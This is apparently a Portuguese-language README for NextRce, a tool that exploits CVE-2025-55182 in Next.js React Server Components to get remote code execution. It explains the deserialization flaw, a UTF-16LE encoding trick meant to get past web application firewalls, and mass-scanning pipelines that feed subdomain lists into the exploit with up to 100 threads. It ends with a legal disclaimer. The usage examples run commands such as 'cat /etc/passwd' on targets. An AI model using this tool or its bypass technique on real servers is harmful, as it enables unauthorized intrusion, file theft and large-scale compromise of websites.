
Ferramenta de Exploração de React Shell e Next.js RSC (CVE-2025-55182)
Desenvolvido por Mitsec
Payloads padrão contendo palavras-chave como child_process ou execSync são frequentemente bloqueados por Web Application Firewalls (WAFs).
O NextRCSWaff.py utiliza um mecanismo de codificação especializado em UTF-16LE (Little Endian). Ao codificar o payload malicioso nesse formato específico, a sequência de bytes muda completamente, tornando-o invisível para a maioria dos WAFs baseados em assinatura. No entanto, o servidor Next.js (Node.js) decodifica e executa o comando corretamente.
Prova de Conceito: a captura de tela acima demonstra um payload padrão sendo bloqueado (topo), seguido por uma execução de RCE bem-sucedida usando o NextRCSWaff.py com a flag --bypass (base).
O NextRce é uma ferramenta de segurança de alto desempenho e multithread projetada para detectar e explorar a CVE-2025-55182. Ela tem como alvo específico a implementação dos React Server Components (RSC) na arquitetura App Router do Next.js.
Ao manipular o processo de serialização em Server Actions, o NextRce injeta um payload cuidadosamente elaborado para obter Execução Remota de Código (RCE) em instâncias vulneráveis. Ele possui um mecanismo inteligente de detecção que distingue automaticamente arquiteturas App Router vulneráveis de Pages Routers legados e seguros, garantindo eficiência durante varreduras em massa.
window.__next_f) para identificar alvos vulneráveis com App Router em vez de sites com Pages Router legados.stdin. Integra-se perfeitamente a ferramentas de reconhecimento como subfinder, httpx e gau.ThreadPoolExecutor integrado permite escanear milhares de domínios simultaneamente com sobrecarga mínima de recursos.O App Router do Next.js utiliza um formato de serialização personalizado para React Server Components (RSC). A vulnerabilidade existe na lógica de desserialização dos cabeçalhos Next-Action. Quando um objeto especificamente elaborado (poluindo o __proto__) é enviado a um endpoint de server action (por exemplo, /adfa), o parser interno pode ser coagido a executar código Node.js arbitrário via child_process.
X-Powered-By: Next.js e estruturas de caminho específicas (/_next/).window.__next_f -> Vulnerável (App Router)__NEXT_DATA__ -> Seguro (Pages Router)execSync(cmd). O stdout é codificado em base64 e retornado no campo digest da resposta de erro do servidor, que o NextRce decodifica e exibe.# Clone the repository
git clone [https://github.com/ynsmroztas/NextRce.git](https://github.com/ynsmroztas/NextRce.git)
# Navigate to the directory
cd NextRce
# Install dependencies
pip install requests
💻 Exemplos de Uso
1. Modo de Bypass de WAF (Usando NextRCSWaff.py)
Use este script quando o alvo parecer vulnerável, mas os exploits padrão forem bloqueados.
# Enable UTF-16LE encoding with the --bypass flag
python3 NextRCSWaff.py -u https://target.com) -c "whoami" --bypass
2. Modo Pipeline / Bug Bounty
Projetado para pipelines Linux. Envie suas listas de subdomínios diretamente para a ferramenta.
# Standard scan
subfinder -d target.com -silent | httpx -sc -td -title -server -silent | python3 nextrce.py -c "id" -t 50
# WAF Bypass scan
subfinder -d target.com -silent | httpx -sc -td -title -server -silent | python3 NextRCSWaff.py -c "id" -B
3. Varredura de Alvo Único
Teste um endpoint específico com um comando personalizado usando o script padrão.
python3 nextrce.py -u https://vulnerable.target.com -c "cat /etc/passwd"
4. Varredura em Massa a Partir de Arquivo
Escaneie uma lista de URLs a partir de um arquivo com alta concorrência.
python3 nextrce.py -l targets.txt -c "whoami" -t 100
5. Modo Proxy (Depuração)
Encaminhe o tráfego pelo Burp Suite ou outro proxy para análise.
python3 nextrce.py -u https://target.com -p http://127.0.0.1:8080
⚙️ Opções de Linha de Comando
Flag,Descrição,Padrão
"-u, --url",URL única do alvo para escanear,None
"-l, --list",Caminho do arquivo contendo uma lista de URLs,None
"-c, --cmd",Comando para executar no servidor,id
"-t, --threads",Número de threads simultâneas,30
"-p, --proxy","URL do proxy HTTP (por exemplo, http://127.0.0.1:8080)",None
"-v, --verbose",Ativa a saída detalhada (mostra tentativas falhas),False
"-B, --bypass",(Somente NextRCSWaff.py) Ativa a codificação UTF-16LE para fazer bypass de WAFs,False
⚠️ Aviso Legal
Esta ferramenta foi desenvolvida apenas para fins educacionais e de pesquisa em segurança. O autor (Mitsec) não é responsável por qualquer uso ilegal, dano ou acesso não autorizado causado por esta ferramenta. Sempre obtenha permissão explícita do proprietário do sistema antes de realizar qualquer teste de segurança.
👤 Autor
O NextRce é desenvolvido e mantido por Mitsec.
Twitter/X: @ynsmroztas
GitHub: ynsmroztas